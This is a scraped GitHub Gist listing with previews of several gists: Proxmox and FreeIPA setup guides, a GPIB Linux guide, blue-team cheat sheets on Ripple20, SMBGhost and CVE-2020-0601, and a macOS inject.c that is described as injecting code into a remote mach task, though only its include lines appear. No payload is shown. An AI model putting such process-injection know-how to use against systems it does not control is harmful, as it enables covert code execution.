Skip to content

Instantly share code, notes, and snippets.

Avatar

v vogelfreiheit

View GitHub Profile
@vocaeq
vocaeq / inject.c
Last active March 14, 2023 20:12 — forked from knightsc/inject.c
An example of how to inject code to call dlopen and load a dylib into a remote mach task. Tested on 12.5 M1 Pro.
View inject.c
#include <dlfcn.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <mach/mach.h>
#include <mach/error.h>
#include <errno.h>
#include <stdlib.h>
#include <sys/sysctl.h>
#include <sys/mman.h>
@Juul
Juul / gpib_linux_82350.md
Last active October 14, 2022 02:23
Guide for setting up GPIB support in Linux for the HP/Agilent 82350 A and B PCI cards
View gpib_linux_82350.md

This is a guide for getting the HP/Agilent 82350 A or B GPIB cards working on Linux.

There are other guides made by other people for a couple of other GPIB adapters here:

Unfortunately the mainline Linux kernel does not have any GPIB support. Even more unfortunate is that neither Ubuntu nor Debian appear to have packages for the kernel modules nor do any third-party apt repos appear to exist that are remotely up to date.

@rechner
rechner / freeipa-proxmox.sh
Created July 28, 2020 23:49
View freeipa-proxmox.sh
# Setting up Proxmox with a certificate from FreeIPA.
# This assumes you've already joined the machine with ipa-client-install
# Get a ticket as someone that can issue certificates
kinit admin
cat <<EOF > /usr/local/sbin/set-ssl-permissions
#!/bin/bash
FILES=/etc/pve/nodes/proxmox/{pve-ssl.key,pve-ssl.pem}
@SwitHak
SwitHak / 20200618-TLP-WHITE_Ripple20.md
Last active April 28, 2022 21:44
BlueTeam CheatSheet * Ripple20 * | Last updated: 2020-06-26 2121 UTC
View 20200618-TLP-WHITE_Ripple20.md

Ripple20, set of vulnerabilities inside Treck / KASAGO IP Stacks

General

  • Ripple20 is the codename to a set of 19 vulnerabilities discovered by the cybersecurity team JSOF.
  • These vulnerabilities are inside an IP stack, selled under two different names (Treck TCP/IP for U.S market Kasago TCP/IP, for Asia market. -These two stacks were bought and used under privated-labeled by several softwares companies, some known names are: GHnetv2, Kwiknet, Quadnet.
  • But there's more, these stacks were also integrated, sometimes with modifications, inside several RTOS (real-time operating system).
  • Last, some of the vulnerabilities, depending the device operating system, configuration or location can have greater or lower CVSS score.
  • My advice is for companies to ask their suppliers if they use one of this stack and assess the risk following their company risk policy.
  • This will not be an easy set of vulnerabilities to patch, sadly.
@ajmassi
ajmassi / LXCBindMount.md
Last active March 16, 2023 15:15
Create a bind mount from a Proxmox host on an unprivileged lxc container
View LXCBindMount.md

Proxmox Assign Bind Mount To Unprivileged Container

In order for the LXC container to have full access the proxmox host directory, a subgid is set as owner of a host directory, and an ACL is used to ensure permissions.

Bind Mount dataset to LXC

Add the following line to /etc/pve/lxc/<CT_ID>.conf

mp0:/mount/point/on/host,mp=/mount/point/on/lxc

Create group on host

In the default Proxmox configuration, unpriviliged container subgids will have the prefix "10" followed by the expected 4-digit gid.

@yvesh
yvesh / proxmox-zfs-encryption.md
Last active March 12, 2023 15:36
Proxmox 6.1 ZFS native full disk (ZFS root) encryption.
View proxmox-zfs-encryption.md

Simple guide for fulldisk encryption with Proxmox and ZFS native encryption

Install normally using the installer, after the setup reboot into recovery mode (from the USB stick). Make sure to install in UEFI mode (you need systemd-boot).

If the USB stick is not working for you, because of the old Kernel version (2.6.x), you can also use an Ubuntu 19.10 / 20.04 boot stick. ZFS suport is enabled there out of the box.

Steps:

@SwitHak
SwitHak / 20200312-TLP-WHITE_CVE-2020-0796.md
Last active February 21, 2023 11:19
BlueTeam CheatSheet * CVE-2020-0796 * SMBGhost | Last updated: 2020-03-18 1238 UTC
View 20200312-TLP-WHITE_CVE-2020-0796.md

CVE-2020-0796 AKA SMBGhost

General

  • A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests.
  • An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server or client.
  • To exploit the vulnerability against a server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 server. To exploit the vulnerability against a client, an unauthenticated attacker would need to configure a malicious SMBv3 server and convince a user to connect to it.
  • The security update addresses the vulnerability by correcting how the SMBv3 protocol handles these specially crafted requests.
  • Vulnerability was discovered by Microsoft Platform Security Assurance & Vulnerability Research team.

Affected products:

@fopenp
fopenp / ringbuffer.cpp
Created February 5, 2020 11:59
View ringbuffer.cpp
// -lstdc++ -std=c++17 -lpthread
// https://forums.mageia.org/en/viewtopic.php?f=5&t=13294
#include <iostream>
#include <iterator>
#include <list>
#include <sstream>
// https://github.com/yhirose/cpp-httplib
#include "httplib.h"
@johannrichard
johannrichard / asn.js
Last active November 20, 2021 15:11
Serverless Worker Function for ASN prefix parsing for OPNsense and pfSense
View asn.js
/***
* Worker Function for ASN prefix parsing
* Will query the BigIP API for a given ASN and return a plain-text representation of the ASN prefixes
* (IP ranges) that can be used in either OPNsense or pfSense URL Tables (Firewall alias).
*
* See https://docs.opnsense.org/manual/aliases.html (OPNsense) and https://docs.netgate.com/pfsense/en/latest/firewall/aliases.html (pfSense) for details of their use.
*
* You can deploy this worker for example on the free tier of CloudFlare (Up to 100'000 requests a day) or
* any other serverless platform that supports JavaScript
*
@SwitHak
SwitHak / 20200114-TLP-WHITE_CVE-2020-0601.md
Last active February 8, 2023 13:42
BlueTeam CheatSheet * CVE-2020-0601 * crypt32.dll | Last updated: 2020-01-21 1817 UTC
View 20200114-TLP-WHITE_CVE-2020-0601.md

CVE-2020-0601 AKA ChainOfFools OR CurveBall

General

  • Microsoft disclosed a vulnerability in their monthly Patch Tuesday referenced under CVE-2020-0601.
  • The vulnerability was discovered by the U.S. National Security Agency, anounced today (2020-01-14) in their press conference, followed by a blog post and an official security advisory.
  • The flaw is located in the "CRYPT32.DLL" file under the C:\Windows\System32\ directory.

Vulnerability explanation

  • NSA description:
  • NSA has discovered a critical vulnerability (CVE-2020-0601) affecting Microsoft Windows® cryptographic functionality.